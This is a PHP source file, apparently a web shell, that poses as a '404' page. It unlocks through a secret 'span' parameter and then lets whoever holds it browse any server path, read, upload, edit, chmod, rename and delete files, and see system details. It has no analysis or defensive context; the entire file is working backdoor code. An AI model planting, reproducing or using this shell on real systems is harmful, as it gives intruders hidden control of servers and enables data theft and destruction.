data.php

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. $id=$_GET['span'];
5.  
6. session_start();
7. if ($id!=''){
8. // store session data
9. $_SESSION['views']=$id;
10. }
11. if($_SESSION['views']!='spanskk'){die();}
12. if(get_magic_quotes_gpc()){
13. foreach($_POST as $key=>$value){
14. $_POST[$key] = stripslashes($value);
15. }
16. }
17. echo '<!DOCTYPE HTML>
18. <HTML>
19. <HEAD>
20. <link href="" rel="stylesheet" type="text/css">
21. <title>404-server!!</title>
22. <style>
23. body{
24. font-family: "Racing Sans One", cursive;
25. background-color: #e6e6e6;
26. text-shadow:0px 0px 1px #757575;
27. }
28. #content tr:hover{
29. background-color: #636263;
30. text-shadow:0px 0px 10px #fff;
31. }
32. #content .first{
33. background-color: silver;
34. }
35. #content .first:hover{
36. background-color: silver;
37. text-shadow:0px 0px 1px #757575;
38. }
39. table{
40. border: 1px #000000 dotted;
41. }
42. H1{
43. font-family: "Rye", cursive;
44. }
45. a{
46. color: #000;
47. text-decoration: none;
48. }
49. a:hover{
50. color: #fff;
51. text-shadow:0px 0px 10px #ffffff;
52. }
53. input,select,textarea{
54. border: 1px #000000 solid;
55. -moz-border-radius: 5px;
56. -webkit-border-radius:5px;
57. border-radius:5px;
58. }
59. </style>
60. </HEAD>
61. <BODY>
62. <H1><center>config root man</center></H1>
63. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
64. <tr><td>Current Path : ';
65. if(isset($_GET['path'])){
66. $path = $_GET['path'];
67. }else{
68. $path = getcwd();
69. }
70. $path = str_replace('\\','/',$path);
71. $paths = explode('/',$path);
72.  
73. foreach($paths as $id=>$pat){
74. if($pat == '' && $id == 0){
75. $a = true;
76. echo '<a href="?path=/">/</a>';
77. continue;
78. }
79. if($pat == '') continue;
80. echo '<a href="?path=';
81. for($i=0;$i<=$id;$i++){
82. echo "$paths[$i]";
83. if($i != $id) echo "/";
84. }
85. echo '">'.$pat.'</a>/';
86. }
87. echo '</td></tr><tr><td>';
88. if(isset($_FILES['file'])){
89. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
90. echo '<font color="green">File Upload Done.</font><br />';
91. }else{
92. echo '<font color="red">File Upload Error.</font><br />';
93. }
94. }
95. echo '<b><br>'.php_uname().'<br></b>';
96. echo '<form enctype="multipart/form-data" method="POST">
97. Upload File : <input type="file" name="file" />
98. <input type="submit" value="upload" />
99. </form>
100. </td></tr>';
101. if(isset($_GET['filesrc'])){
102. echo "<tr><td>Current File : ";
103. echo $_GET['filesrc'];
104. echo '</tr></td></table><br />';
105. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
106. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
107. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
108. if($_POST['opt'] == 'chmod'){
109. if(isset($_POST['perm'])){
110. if(chmod($_POST['path'],$_POST['perm'])){
111. echo '<font color="green">Change Permission Done.</font><br />';
112. }else{
113. echo '<font color="red">Change Permission Error.</font><br />';
114. }
115. }
116. echo '<form method="POST">
117. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
118. <input type="hidden" name="path" value="'.$_POST['path'].'">
119. <input type="hidden" name="opt" value="chmod">
120. <input type="submit" value="Go" />
121. </form>';
122. }elseif($_POST['opt'] == 'rename'){
123. if(isset($_POST['newname'])){
124. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
125. echo '<font color="green">Change Name Done.</font><br />';
126. }else{
127. echo '<font color="red">Change Name Error.</font><br />';
128. }
129. $_POST['name'] = $_POST['newname'];
130. }
131. echo '<form method="POST">
132. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
133. <input type="hidden" name="path" value="'.$_POST['path'].'">
134. <input type="hidden" name="opt" value="rename">
135. <input type="submit" value="Go" />
136. </form>';
137. }elseif($_POST['opt'] == 'edit'){
138. if(isset($_POST['src'])){
139. $fp = fopen($_POST['path'],'w');
140. $contents=str_replace("{#span#}","&",$_POST['src']);
141. $contents=str_replace("{#span1#}","+",$contents);
142. $contents=str_replace("{#span2#}","%",$contents);
143. if(fwrite($fp,$contents)){
144. echo '<font color="green">Edit File Done.</font><br />';
145. }else{
146. echo '<font color="red">Edit File Error.</font><br />';
147. }
148. fclose($fp);
149. }
150. echo '<form method="POST">
151. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
152. <input type="hidden" name="path" value="'.$_POST['path'].'">
153. <input type="hidden" name="opt" value="edit">
154. <input type="submit" value="Go" />
155. </form>';
156. }
157. echo '</center>';
158. }else{
159. echo '</table><br /><center>';
160. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
161. if($_POST['type'] == 'dir'){
162. if(rmdir($_POST['path'])){
163. echo '<font color="green">Delete Dir Done.</font><br />';
164. }else{
165. echo '<font color="red">Delete Dir Error.</font><br />';
166. }
167. }elseif($_POST['type'] == 'file'){
168. if(unlink($_POST['path'])){
169. echo '<font color="green">Delete File Done.</font><br />';
170. }else{
171. echo '<font color="red">Delete File Error.</font><br />';
172. }
173. }
174. }
175. echo '</center>';
176. $scandir = scandir($path);
177. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
178. <tr class="first">
179. <td><center>Name</center></td>
180. <td><center>Size</center></td>
181. <td><center>Permissions</center></td>
182. <td><center>Options</center></td>
183. </tr>';
184.  
185. foreach($scandir as $dir){
186. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
187. echo "<tr>
188. <td><a href=\"?path=$path/$dir\">$dir</a></td>
189. <td><center>--</center></td>
190. <td><center>";
191. if(is_writable("$path/$dir")) echo '<font color="green">';
192. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
193. echo perms("$path/$dir");
194. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
195.  
196. echo "</center></td>
197. <td><center><form method=\"POST\" action=\"?option&path=$path\">
198. <select name=\"opt\">
199. <option value=\"\"></option>
200. <option value=\"delete\">Delete</option>
201. <option value=\"chmod\">Chmod</option>
202. <option value=\"rename\">Rename</option>
203. </select>
204. <input type=\"hidden\" name=\"type\" value=\"dir\">
205. <input type=\"hidden\" name=\"name\" value=\"$dir\">
206. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
207. <input type=\"submit\" value=\">\" />
208. </form></center></td>
209. </tr>";
210. }
211. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
212. foreach($scandir as $file){
213. if(!is_file("$path/$file")) continue;
214. $size = filesize("$path/$file")/1024;
215. $size = round($size,3);
216. if($size >= 1024){
217. $size = round($size/1024,2).' MB';
218. }else{
219. $size = $size.' KB';
220. }
221.  
222. echo "<tr>
223. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
224. <td><center>".$size."</center></td>
225. <td><center>";
226. if(is_writable("$path/$file")) echo '<font color="green">';
227. elseif(!is_readable("$path/$file")) echo '<font color="red">';
228. echo perms("$path/$file");
229. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
230. echo "</center></td>
231. <td><center><form method=\"POST\" action=\"?option&path=$path\">
232. <select name=\"opt\">
233. <option value=\"\"></option>
234. <option value=\"delete\">Delete</option>
235. <option value=\"chmod\">Chmod</option>
236. <option value=\"rename\">Rename</option>
237. <option value=\"edit\">Edit</option>
238. </select>
239. <input type=\"hidden\" name=\"type\" value=\"file\">
240. <input type=\"hidden\" name=\"name\" value=\"$file\">
241. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
242. <input type=\"submit\" value=\">\" />
243. </form></center></td>
244. </tr>";
245. }
246. echo '</table>
247. </div>';
248. }
249. echo '<br />Man Man <br />
250. </BODY>
251. </HTML>';
252. function perms($file){
253. $perms = fileperms($file);
254.  
255. if (($perms & 0xC000) == 0xC000) {
256. // Socket
257. $info = 's';
258. } elseif (($perms & 0xA000) == 0xA000) {
259. // Symbolic Link
260. $info = 'l';
261. } elseif (($perms & 0x8000) == 0x8000) {
262. // Regular
263. $info = '-';
264. } elseif (($perms & 0x6000) == 0x6000) {
265. // Block special
266. $info = 'b';
267. } elseif (($perms & 0x4000) == 0x4000) {
268. // Directory
269. $info = 'd';
270. } elseif (($perms & 0x2000) == 0x2000) {
271. // Character special
272. $info = 'c';
273. } elseif (($perms & 0x1000) == 0x1000) {
274. // FIFO pipe
275. $info = 'p';
276. } else {
277. // Unknown
278. $info = 'u';
279. }
280.  
281. // Owner
282. $info .= (($perms & 0x0100) ? 'r' : '-');
283. $info .= (($perms & 0x0080) ? 'w' : '-');
284. $info .= (($perms & 0x0040) ?
285. (($perms & 0x0800) ? 's' : 'x' ) :
286. (($perms & 0x0800) ? 'S' : '-'));
287.  
288. // Group
289. $info .= (($perms & 0x0020) ? 'r' : '-');
290. $info .= (($perms & 0x0010) ? 'w' : '-');
291. $info .= (($perms & 0x0008) ?
292. (($perms & 0x0400) ? 's' : 'x' ) :
293. (($perms & 0x0400) ? 'S' : '-'));
294.  
295. // World
296. $info .= (($perms & 0x0004) ? 'r' : '-');
297. $info .= (($perms & 0x0002) ? 'w' : '-');
298. $info .= (($perms & 0x0001) ?
299. (($perms & 0x0200) ? 't' : 'x' ) :
300. (($perms & 0x0200) ? 'T' : '-'));
301.  
302. return $info;
303. }
304. ?>